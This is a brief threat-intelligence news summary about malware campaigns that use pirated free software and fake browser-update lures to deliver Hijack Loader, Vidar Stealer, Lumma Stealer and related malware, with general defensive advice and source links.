Threat actors are using free software as a bait to distribute malware, targeting unsuspecting consumers with pirated versions of popular software [1].

Description

This tactic involves the deployment of the Hijack Loader malware, which then installs the Vidar Stealer information stealer [1]. The campaign utilizes DLL side-loading techniques to secretly initiate Hijack Loader [1] [2], which then deploys Vidar Stealer through an AutoIt script [1] [2]. The malware is designed to bypass User Account Control (UAC) and exploit the CMSTPLUA COM interface for privilege escalation [2] [3], ultimately adding itself to Windows Defender’s exclusion list for defense evasion [2] [3]. In addition to stealing sensitive credentials from web browsers [1], the attack chain also includes the installation of a bitcoin miner on compromised hosts. ClearFake campaigns deceive site visitors into executing a PowerShell script [1], resulting in the delivery of Lumma Stealer [1] [2], Amadey Loader [1] [2], XMRig miner [1] [2], and clipper malware [1] [2]. TA571 malspam campaigns utilize HTML attachments to spread Vidar Stealer [1] [2], while another threat actor known as ClickFix employs defective browser update lures [1]. Victims are presented with a Base64-encoded PowerShell command that installs either Matanbuchus or DarkGate malware [1]. Furthermore, eSentire has uncovered a malware operation that impersonates Indeed.com to distribute the SolarMarker information-stealing virus through SEO tactics [1].

Conclusion

These malicious activities highlight the importance of staying vigilant and implementing robust cybersecurity measures to protect against malware threats. Organizations and individuals should be cautious when downloading free software and should regularly update their security software to defend against evolving cyber threats.

References

[1] https://rhyno.io/blogs/cybersecurity-awareness-training/cybercriminals-use-free-software-to-deploy-malware/
[2] https://thehackernews.com/2024/06/cybercriminals-exploit-free-software.html
[3] https://patabook.com/technology/2024/06/18/cybercriminals-exploit-free-software-lures-to-deploy-hijack-loader-and-vidar-stealer/